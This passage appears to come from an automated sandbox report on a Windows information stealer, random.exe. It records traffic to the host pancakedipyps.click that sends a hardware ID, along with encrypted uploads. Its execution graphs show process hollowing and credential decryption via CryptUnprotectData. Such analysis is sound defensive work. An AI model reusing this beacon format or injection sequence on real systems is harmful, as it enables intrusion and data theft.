                                      2025-01-08 10:47:06 UTC15331OUTData Raw: ac 82 f8 cd 49 7e 30 c2 b7 4a ba 33 71 74 a3 2f 23 e7 3f d7 f2 bb 8c e0 62 d6 cd bb 06 73 11 f3 4a 77 b8 39 82 83 05 5f 76 a7 fd 30 b9 6f b7 e1 bd 58 da 96 a6 94 d2 1a 5a 53 e1 72 e9 d2 e6 26 9b c5 b9 1f 6f c6 d1 67 1c 9d 5b b6 08 9c 90 82 7b 2d 24 ba 01 35 46 e2 7f c1 63 36 b8 9c f9 98 c0 b2 1c 39 12 c9 99 2d 9f 70 75 19 9c 29 5f ee 5e e1 20 15 15 43 ca d8 2c 94 16 96 36 99 f2 d4 bf 64 41 09 b7 a6 29 10 83 b1 e4 23 f1 59 96 36 11 24 09 59 bf 08 e7 06 90 7a 15 5b 3b 2c 2a dc 7f 2f 28 b4 56 52 8e 10 12 8b be 31 e2 08 32 9a 1b 9c 73 c0 66 68 04 da 75 ad 16 e6 7d c9 b8 84 c5 c7 bf 7f 2c 08 0f 0b 42 7f d2 e8 ee c1 9f 85 18 ab fe 33 5b 13 fe a7 aa f8 82 cf f4 04 34 dd fa 96 36 f2 df 97 89 0d cd d6 03 43 dc 91 63 af c0 e2 d8 08 43 66 61 a5 ca f9 8b 64 95 73 0f
                                      Data Ascii: I~0J3qt/#?bsJw9_v0oXZSr&og[{-$5Fc69-pu)_^ C,6dA)#Y6$Yz[;,*/(VR12sfhu},B3[46CcCfads
                                      2025-01-08 10:47:06 UTC15331OUTData Raw: ba 82 be d6 30 c1 ca ee 19 9b 7a fb b6 75 c7 53 bf fe d4 d5 fe bd 2d c8 2e 7f 81 47 14 1d 79 33 21 e4 dd 08 ca eb d2 e8 a4 e5 1b 61 70 12 da ab 35 6d f4 59 75 8a 50 c0 c2 b7 0c ca cc c2 2e 4c 8d 13 f9 26 6a 17 ea db 2a 4d 8e b0 ec 4f bd 06 bc 7e 24 ec 8f e0 e7 18 a0 9b 0b 2d a3 18 9c b2 3c b4 0b 5f 7e 82 9a c7 c6 40 3e 95 c8 26 45 57 dd 45 db d1 b3 8d 00 0e 2b b5 8d 14 db 9d b2 8b a7 da 2a 38 5a 82 35 c0 42 bf d6 5f bc 72 d9 4f 3b ba ee f6 10 19 96 6f 80 30 78 bc 90 e2 e5 b7 2a ca f7 1a ec 75 67 76 ad bd 50 15 7a 6c ac 73 3f 2a fd 02 eb 08 52 75 56 03 9f ba 6e 9b b7 f1 cc 0f 6f d3 cd 8f 53 3d 9f c7 52 3c fc de 15 d0 32 70 06 8b e3 23 1b 27 f8 ad 3f 86 d1 ba 24 4c be 7f 13 6b 65 77 46 13 ca f8 7c d6 f5 f5 78 84 49 53 34 f3 51 73 2e 1c 15 55 a2 5c e8 ff 49
                                      Data Ascii: 0zuS-.Gy3!ap5mYuP.L&j*MO~$-<_~@>&EWE+*8Z5B_rO;o0x*ugvPzls?*RuVnoS=R<2p#'?$LkewF|xIS4Qs.U\I
                                      2025-01-08 10:47:06 UTC15331OUTData Raw: 81 2c 2b 65 30 b3 75 c6 d0 46 f5 14 19 99 e6 d0 46 45 8d f2 5c 33 61 4e ab 9b 76 fe d9 6f 7d 49 a8 36 89 e2 34 19 41 29 c3 bc 12 71 c8 bb 4c ae 0d 93 85 b6 c8 7c aa 14 02 22 76 45 81 84 a3 2c ce ba ff 18 91 dd 17 d3 1e 5a 8a 6b ae 0b c8 7f c5 40 e7 ec 52 2c ff 77 9c 94 fd 51 69 ed 9b 1c ed db f2 e9 01 b6 88 72 04 83 3c ff eb 22 ae 30 d9 8a 59 e3 dd 8f 52 dd d3 1f 52 24 dd a7 3b b5 cc 72 a8 cb 8a b4 af 7d a7 52 4e 60 fd c8 4c 29 2d 3a 4f 6c fa 56 de ad 1c 56 e8 a7 2d d9 ff 4e 98 39 31 bf 1d 90 9c 62 43 71 5f 2d 4e 85 0f fc eb 65 b0 67 f9 43 dd ec 8b d9 c8 f7 d2 8d 5e e1 2f 17 ab f5 66 dc 95 67 2d ff 41 9f fd 07 ed 1a 21 35 5b 2d da b1 f6 8d d5 37 53 9a f6 b1 2f e0 89 74 61 de 74 cc b1 5b 27 5d 82 f6 ba 9d 57 b4 12 e8 00 37 ed 32 34 d4 8f 9e 0b da 3e 68 b6
                                      Data Ascii: ,+e0uFFE\3aNvo}I64A)qL|"vE,Zk@R,wQir<"0YRR$;r}RN`L)-:OlVV-N91bCq_-NegC^/fg-A!5[-7S/tat[']W724>h
                                      2025-01-08 10:47:09 UTC1139INHTTP/1.1 200 OK
                                      Date: Wed, 08 Jan 2025 10:47:09 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=slku24d5celfbslg354674j54m; expires=Sun, 04 May 2025 04:33:46 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SwUhZpOSYIBbDcbbn2sprKI%2B%2FJllR0%2BrqkS44uDQGZ%2FG0xt20FCs0vcyv%2BlfbtYwmpL1FuB%2FmdT7CGsQcJ0iY0pHbk1YLpMKgIB7wDiclJtsa0TXtjebOEv2igv2tLi8MJPezKlc"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8feb9b890a724216-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1706&rtt_var=649&sent=203&recv=602&lost=0&retrans=0&sent_bytes=2848&recv_bytes=586618&delivery_rate=1675272&cwnd=250&unsent_bytes=0&cid=7caeec3ac7a624bf&ts=3595&x=0"


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.449749188.114.97.34436940C:\Users\user\Desktop\random.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-08 10:47:10 UTC267OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 81
                                      Host: pancakedipyps.click
                                      2025-01-08 10:47:10 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 31 32 46 35 39 32 37 31 37 39 44 30 46 44 44 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36
                                      Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=12F5927179D0FDD2822D1F4978021086
                                      2025-01-08 10:47:10 UTC1125INHTTP/1.1 200 OK
                                      Date: Wed, 08 Jan 2025 10:47:10 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=hs2o5v4vks7665d3raa4jk71rf; expires=Sun, 04 May 2025 04:33:49 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0pUIAokG2JBggOxduailvC2aJkDODm3vNcbwdZbMYg3PGGvKl%2BjTTYhLvUBaM3%2BCiwRSX278T0NP6KNNlwzh9KyLSI%2Ft6RClc6my4s3azo78L23rPavuuwBQecVDMnon4pD87hT"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8feb9ba2ad98efa1-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=2006&rtt_var=768&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=984&delivery_rate=1410628&cwnd=165&unsent_bytes=0&cid=5690c22e8a0fa9bd&ts=501&x=0"
                                      2025-01-08 10:47:10 UTC54INData Raw: 33 30 0d 0a 65 48 30 6a 78 75 7a 75 38 4e 45 48 4d 6f 4a 63 4d 5a 4f 50 4e 6d 46 75 66 6d 6f 70 75 68 32 65 62 65 67 6a 79 50 42 41 73 6b 45 6a 49 41 3d 3d 0d 0a
                                      Data Ascii: 30eH0jxuzu8NEHMoJcMZOPNmFufmopuh2ebegjyPBAskEjIA==
                                      2025-01-08 10:47:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:05:46:55
                                      Start date:08/01/2025
                                      Path:C:\Users\user\Desktop\random.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\random.exe"
                                      Imagebase:0xb90000
                                      File size:349'696 bytes
                                      MD5 hash:6446A00EB59754E15749AF229B0D5217
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:05:46:55
                                      Start date:08/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:05:46:55
                                      Start date:08/01/2025
                                      Path:C:\Users\user\Desktop\random.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\random.exe"
                                      Imagebase:0x290000
                                      File size:349'696 bytes
                                      MD5 hash:6446A00EB59754E15749AF229B0D5217
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:05:46:55
                                      Start date:08/01/2025
                                      Path:C:\Users\user\Desktop\random.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\random.exe"
                                      Imagebase:0x560000
                                      File size:349'696 bytes
                                      MD5 hash:6446A00EB59754E15749AF229B0D5217
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:6
                                      Start time:05:46:55
                                      Start date:08/01/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 140
                                      Imagebase:0x4e0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:8.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:47.4%
                                        Total number of Nodes:19
                                        Total number of Limit Nodes:1
                                        execution_graph 1855 3088096 1856 30880b0 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 1855->1856 1857 3088157 WriteProcessMemory 1856->1857 1862 308805f 1856->1862 1858 308819c 1857->1858 1859 30881de WriteProcessMemory Wow64SetThreadContext ResumeThread 1858->1859 1860 30881a1 WriteProcessMemory 1858->1860 1860->1858 1861 3088147 TerminateProcess 1861->1862 1862->1861 1863 308809e GetPEB 1862->1863 1863->1856 1864 2e60c18 1865 2e60c28 1864->1865 1867 2e60cbe 1865->1867 1868 2e60668 1865->1868 1869 2e629f0 VirtualProtect 1868->1869 1871 2e62a78 1869->1871 1871->1867 1872 2e60aa8 1875 2e60ac7 1872->1875 1873 2e60cbe 1874 2e60668 VirtualProtect 1874->1873 1875->1873 1875->1874

                                        Control-flow Graph

                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,03087E8B,03087E7B), ref: 030880B1
                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 030880C4
                                        • Wow64GetThreadContext.KERNEL32(00000394,00000000), ref: 030880E2
                                        • ReadProcessMemory.KERNELBASE(00000398,?,03087ECF,00000004,00000000), ref: 03088106
                                        • VirtualAllocEx.KERNELBASE(00000398,?,?,00003000,00000040), ref: 03088131
                                        • TerminateProcess.KERNELBASE(00000398,00000000), ref: 03088150
                                        • WriteProcessMemory.KERNELBASE(00000398,00000000,?,?,00000000,?), ref: 03088189
                                        • WriteProcessMemory.KERNELBASE(00000398,00400000,?,?,00000000,?,00000028), ref: 030881D4
                                        • WriteProcessMemory.KERNELBASE(00000398,?,?,00000004,00000000), ref: 03088212
                                        • Wow64SetThreadContext.KERNEL32(00000394,02FB0000), ref: 0308824E
                                        • ResumeThread.KERNELBASE(00000394), ref: 0308825D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1783938236.0000000003087000.00000040.00000800.00020000.00000000.sdmp, Offset: 03087000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3087000_random.jbxd
                                        Similarity
                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                        • String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                        • API String ID: 2440066154-232383841
                                        • Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                                        • Instruction ID: ed4969dec054787ee7e0faf6ed5689c1519e436ac3dd8468a7e1e361a65a61c4
                                        • Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                                        • Instruction Fuzzy Hash: 3FB1187660124AAFDB60CF68CC80BDA77A5FF88714F158564EA1CAB341C770FA41CB94

                                        Control-flow Graph

                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,03087E8B,03087E7B), ref: 030880B1
                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 030880C4
                                        • Wow64GetThreadContext.KERNEL32(00000394,00000000), ref: 030880E2
                                        • ReadProcessMemory.KERNELBASE(00000398,?,03087ECF,00000004,00000000), ref: 03088106
                                        • VirtualAllocEx.KERNELBASE(00000398,?,?,00003000,00000040), ref: 03088131
                                        • TerminateProcess.KERNELBASE(00000398,00000000), ref: 03088150
                                        • WriteProcessMemory.KERNELBASE(00000398,00000000,?,?,00000000,?), ref: 03088189
                                        • WriteProcessMemory.KERNELBASE(00000398,00400000,?,?,00000000,?,00000028), ref: 030881D4
                                        • WriteProcessMemory.KERNELBASE(00000398,?,?,00000004,00000000), ref: 03088212
                                        • Wow64SetThreadContext.KERNEL32(00000394,02FB0000), ref: 0308824E
                                        • ResumeThread.KERNELBASE(00000394), ref: 0308825D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1783938236.0000000003087000.00000040.00000800.00020000.00000000.sdmp, Offset: 03087000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3087000_random.jbxd
                                        Similarity
                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                        • String ID: TerminateProcess
                                        • API String ID: 2440066154-2873147277
                                        • Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                                        • Instruction ID: 8e8f65f6ff411d22d2554d0807335a692ee7538b1ceaef13d1d19e48fa5cdcd4
                                        • Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                                        • Instruction Fuzzy Hash: F2312E72240646ABDB74CF54CC91FEA73A5BFC8B15F148508FB09AF781C6B4BA018B94

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 34 2e629d7-2e62a76 VirtualProtect 36 2e62a7d-2e62a91 34->36 37 2e62a78 34->37 37->36
                                        APIs
                                        • VirtualProtect.KERNELBASE(04083588,?,?,?,?,?,?,?,?,00B959C4,00000000,?,02E60CBE,?,00000040), ref: 02E62A69
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1783761117.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2e60000_random.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: b30de076889174bc126f3ecc6a7cecadb6216446618caf57ac5666fb407f299d
                                        • Instruction ID: 0b92dc874e22d2d4f2e9821551e2ee2f9d60e3c61e7a8b2d7b1f2caf57db7fba
                                        • Opcode Fuzzy Hash: b30de076889174bc126f3ecc6a7cecadb6216446618caf57ac5666fb407f299d
                                        • Instruction Fuzzy Hash: E12145B19053989FCB01CFA9C884ADEFFB0FF09310F14816AE948A7251C3786944CBA1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 38 2e60668-2e62a76 VirtualProtect 41 2e62a7d-2e62a91 38->41 42 2e62a78 38->42 42->41
                                        APIs
                                        • VirtualProtect.KERNELBASE(04083588,?,?,?,?,?,?,?,?,00B959C4,00000000,?,02E60CBE,?,00000040), ref: 02E62A69
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1783761117.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2e60000_random.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 9cf1f595afc8db39cfeae544992d1146611aa885699f87ead59c9aef4cf9be6d
                                        • Instruction ID: a16fce51918e8325d1c20c3693a868f63782a83d1873fb47c074add31d32c88d
                                        • Opcode Fuzzy Hash: 9cf1f595afc8db39cfeae544992d1146611aa885699f87ead59c9aef4cf9be6d
                                        • Instruction Fuzzy Hash: 4A21F2B5900659AFCB00DF9AC884ADEFBB4FB48314F10812AE918A7200C3B5A954CFA5

                                        Execution Graph

                                        Execution Coverage:7.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:48.7%
                                        Total number of Nodes:189
                                        Total number of Limit Nodes:14
                                        execution_graph 14173 4423c5 GetForegroundWindow 14177 444110 14173->14177 14175 4423d1 GetForegroundWindow 14176 4423ec 14175->14176 14178 444124 14177->14178 14178->14175 14288 437180 CoSetProxyBlanket 14289 425713 14290 42571b 14289->14290 14291 42572b RtlExpandEnvironmentStrings 14290->14291 14292 42575c 14291->14292 14292->14292 14298 445260 14292->14298 14294 425874 14295 425a11 GetLogicalDrives 14294->14295 14297 425a27 14294->14297 14296 445260 LdrInitializeThunk 14295->14296 14296->14297 14299 445280 14298->14299 14300 44536e 14299->14300 14302 442080 LdrInitializeThunk 14299->14302 14300->14294 14302->14300 14303 436312 14305 436316 14303->14305 14304 43629a 14305->14304 14306 4363bb SysAllocString 14305->14306 14307 4364d0 14306->14307 14308 421710 14309 42171e 14308->14309 14313 421778 14308->14313 14314 421830 14309->14314 14311 4217ec 14312 41f9a0 LdrInitializeThunk 14311->14312 14311->14313 14312->14313 14315 421840 14314->14315 14316 445260 LdrInitializeThunk 14315->14316 14317 421971 14316->14317 14318 43ce90 14319 43ceb8 14318->14319 14321 43cf2e 14319->14321 14327 442080 LdrInitializeThunk 14319->14327 14323 43cfc0 14321->14323 14325 43d066 14321->14325 14326 442080 LdrInitializeThunk 14321->14326 14323->14325 14328 442080 LdrInitializeThunk 14323->14328 14326->14321 14327->14319 14328->14323 14329 440510 14330 44054e 14329->14330 14331 440530 14329->14331 14332 4404b0 RtlAllocateHeap 14330->14332 14336 44063e 14330->14336 14331->14330 14337 442080 LdrInitializeThunk 14331->14337 14334 44060d 14332->14334 14334->14336 14338 442080 LdrInitializeThunk 14334->14338 14337->14330 14338->14336 14179 430f54 14180 430f64 14179->14180 14180->14180 14181 430f7e FreeLibrary 14180->14181 14183 430f8b 14181->14183 14182 43102b GetComputerNameExA 14184 4310af 14182->14184 14183->14182 14183->14183 14184->14184 14185 408a60 14187 408a6f 14185->14187 14186 408d05 ExitProcess 14187->14186 14188 408cee 14187->14188 14189 408a84 GetCurrentProcessId GetCurrentThreadId 14187->14189 14203 442000 14188->14203 14190 408ac3 SHGetSpecialFolderPathW GetForegroundWindow 14189->14190 14191 408abd 14189->14191 14193 408b95 14190->14193 14191->14190 14193->14193 14199 4404b0 14193->14199 14195 408c27 14195->14188 14202 40d400 CoInitializeEx 14195->14202 14206 443770 14199->14206 14208 443750 14203->14208 14205 442005 FreeLibrary 14205->14186 14207 4404ba RtlAllocateHeap 14206->14207 14207->14195 14209 443759 14208->14209 14209->14205 14344 42f222 14346 42f280 14344->14346 14345 42f2e8 GetComputerNameExA 14346->14345 14346->14346 14347 40daa3 14348 40dad0 14347->14348 14351 43d0d0 14348->14351 14350 40dc55 14352 43d120 14351->14352 14352->14352 14353 43d529 CoCreateInstance 14352->14353 14354 43d585 SysAllocString 14353->14354 14355 43db6d 14353->14355 14358 43d62c 14354->14358 14357 43db7d GetVolumeInformationW 14355->14357 14364 43db9b 14357->14364 14359 43d634 CoSetProxyBlanket 14358->14359 14360 43db5c SysFreeString 14358->14360 14361 43db52 14359->14361 14362 43d654 SysAllocString 14359->14362 14360->14355 14361->14360 14365 43d740 14362->14365 14364->14350 14365->14365 14366 43d764 SysAllocString 14365->14366 14368 43d78a 14366->14368 14367 43db39 SysFreeString SysFreeString 14367->14361 14368->14367 14369 43db2f 14368->14369 14370 43d7ce VariantInit 14368->14370 14369->14367 14372 43d850 14370->14372 14371 43db1e VariantClear 14371->14369 14372->14371 14373 418ba2 14375 418c10 14373->14375 14374 418fb7 14374->14374 14375->14374 14376 445260 LdrInitializeThunk 14375->14376 14376->14375 14215 43b967 14217 43b97f 14215->14217 14216 43b996 GetUserDefaultUILanguage 14218 43b9e1 14216->14218 14217->14216 14219 434865 14222 414c20 14219->14222 14221 43486a CoSetProxyBlanket 14222->14221 14223 4404e2 14224 4404f0 14223->14224 14225 4404f2 14223->14225 14226 4404f7 RtlFreeHeap 14225->14226 14227 40e16e 14231 409b70 14227->14231 14229 40e17a CoUninitialize 14230 40e1b0 14229->14230 14232 409b84 14231->14232 14232->14229 14232->14232 14233 4180f0 14233->14233 14234 4180f8 14233->14234 14235 418468 CryptUnprotectData 14234->14235 14377 421b30 14389 4450f0 14377->14389 14379 42228c 14380 421b77 14380->14379 14381 4404b0 RtlAllocateHeap 14380->14381 14382 421bd2 14381->14382 14388 421be9 14382->14388 14393 442080 LdrInitializeThunk 14382->14393 14384 4404b0 RtlAllocateHeap 14384->14388 14385 421cb9 14385->14379 14395 442080 LdrInitializeThunk 14385->14395 14388->14384 14388->14385 14394 442080 LdrInitializeThunk 14388->14394 14390 445110 14389->14390 14391 445208 14390->14391 14396 442080 LdrInitializeThunk 14390->14396 14391->14380 14393->14382 14394->14388 14395->14385 14396->14391 14397 40d433 CoInitializeSecurity 14398 430030 14399 430080 14398->14399 14401 43014e 14399->14401 14402 442080 LdrInitializeThunk 14399->14402 14402->14401 14236 4425f2 14237 44261e 14236->14237 14238 442602 14236->14238 14238->14237 14240 442080 LdrInitializeThunk 14238->14240 14240->14237 14403 40e139 14408 437c10 14403->14408 14409 437c3e GetSystemMetrics GetSystemMetrics 14408->14409 14410 437c81 14409->14410 14246 42fb7d 14247 42fb88 14246->14247 14247->14247 14248 42fc5a GetPhysicallyInstalledSystemMemory 14247->14248 14249 42fcb0 14248->14249 14249->14249 14250 40df7f 14252 40df8b 14250->14252 14253 40dfa4 14250->14253 14251 40dfee 14274 425560 14251->14274 14252->14253 14278 442080 LdrInitializeThunk 14252->14278 14253->14251 14279 442080 LdrInitializeThunk 14253->14279 14257 40e02e 14258 425da0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap LdrInitializeThunk 14257->14258 14259 40e04e 14258->14259 14260 426010 RtlExpandEnvironmentStrings RtlAllocateHeap LdrInitializeThunk 14259->14260 14261 40e06e 14260->14261 14262 427fc0 RtlAllocateHeap RtlReAllocateHeap LdrInitializeThunk 14261->14262 14263 40e08e 14262->14263 14264 428750 RtlAllocateHeap LdrInitializeThunk 14263->14264 14265 40e097 14264->14265 14266 428b10 RtlAllocateHeap LdrInitializeThunk 14265->14266 14267 40e0a0 14266->14267 14268 42ba20 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings 14267->14268 14269 40e0a9 14268->14269 14270 42a7f0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 14269->14270 14271 40e0c9 14270->14271 14272 437a60 6 API calls 14271->14272 14273 40e0f2 14272->14273 14275 4255d0 14274->14275 14275->14275 14276 4255e6 RtlExpandEnvironmentStrings 14275->14276 14277 425660 14276->14277 14277->14277 14278->14253 14279->14251 14280 40ebff 14282 40ec7e 14280->14282 14283 40ec5f 14280->14283 14281 40ed2e 14282->14281 14286 442080 LdrInitializeThunk 14282->14286 14283->14282 14287 442080 LdrInitializeThunk 14283->14287 14286->14281 14287->14282 14411 442b3b 14413 442b45 14411->14413 14412 442c0e 14413->14412 14415 442080 LdrInitializeThunk 14413->14415 14415->14412

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 43d0d0-43d112 1 43d120-43d18e 0->1 1->1 2 43d190-43d1b6 1->2 3 43d1c0-43d1f8 2->3 3->3 4 43d1fa-43d25f 3->4 5 43d260-43d289 4->5 5->5 6 43d28b-43d2a8 5->6 8 43d2ae-43d2b8 6->8 9 43d3bd-43d3d5 6->9 10 43d2c0-43d31d 8->10 11 43d3e0-43d3ff 9->11 10->10 12 43d31f-43d349 10->12 11->11 13 43d401-43d47b 11->13 14 43d350-43d3af 12->14 15 43d480-43d4c0 13->15 14->14 16 43d3b1-43d3b5 14->16 15->15 17 43d4c2-43d51f 15->17 16->9 18 43d520-43d527 17->18 18->18 19 43d529-43d57f CoCreateInstance 18->19 20 43d585-43d5d5 19->20 21 43db6d-43db99 call 443b60 GetVolumeInformationW 19->21 22 43d5e0-43d605 20->22 26 43dba2-43dba4 21->26 27 43db9b-43db9e 21->27 22->22 24 43d607-43d62e SysAllocString 22->24 32 43d634-43d64e CoSetProxyBlanket 24->32 33 43db5c-43db69 SysFreeString 24->33 28 43dbc7-43dbd2 26->28 27->26 30 43dbd4-43dbdb 28->30 31 43dbde-43dc0b 28->31 30->31 34 43dc10-43dc6a 31->34 35 43db52-43db58 32->35 36 43d654-43d67f 32->36 33->21 34->34 37 43dc6c-43dc97 34->37 35->33 38 43d680-43d6a5 36->38 39 43dca0-43dcdc 37->39 38->38 40 43d6a7-43d732 SysAllocString 38->40 39->39 41 43dcde-43dd02 call 41dce0 39->41 42 43d740-43d762 40->42 46 43dd10-43dd17 41->46 42->42 44 43d764-43d78c SysAllocString 42->44 49 43d792-43d7b4 44->49 50 43db39-43db4e SysFreeString * 2 44->50 46->46 48 43dd19-43dd2c 46->48 51 43dd32-43dd45 call 408430 48->51 52 43dbb0-43dbc1 48->52 56 43d7ba-43d7bd 49->56 57 43db2f-43db35 49->57 50->35 51->52 52->28 54 43dd4a-43dd51 52->54 56->57 59 43d7c3-43d7c8 56->59 57->50 59->57 60 43d7ce-43d843 VariantInit 59->60 61 43d850-43d8d3 60->61 61->61 62 43d8d9-43d8f2 61->62 63 43d8f6-43d8fb 62->63 64 43d901-43d90a 63->64 65 43db1e-43db2b VariantClear 63->65 64->65 66 43d910-43d91f 64->66 65->57 67 43d921-43d926 66->67 68 43d95d 66->68 70 43d93c-43d940 67->70 69 43d95f-43d97d call 408270 68->69 79 43d983-43d997 69->79 80 43dac9-43dada 69->80 72 43d942-43d94b 70->72 73 43d930 70->73 76 43d952-43d956 72->76 77 43d94d-43d950 72->77 75 43d931-43d93a 73->75 75->69 75->70 76->75 78 43d958-43d95b 76->78 77->75 78->75 79->80 81 43d99d-43d9a3 79->81 82 43dae1-43daf2 80->82 83 43dadc 80->83 84 43d9b0-43d9ba 81->84 85 43daf4 82->85 86 43daf9-43db1b call 4082a0 call 408280 82->86 83->82 87 43d9d0-43d9d6 84->87 88 43d9bc-43d9c1 84->88 85->86 86->65 91 43d9f5-43da07 87->91 92 43d9d8-43d9db 87->92 90 43da60-43da76 88->90 95 43da79-43da7f 90->95 97 43da8b-43da94 91->97 98 43da0d-43da10 91->98 92->91 96 43d9dd-43d9f3 92->96 95->80 100 43da81-43da83 95->100 96->90 101 43da96-43da98 97->101 102 43da9a-43da9d 97->102 98->97 103 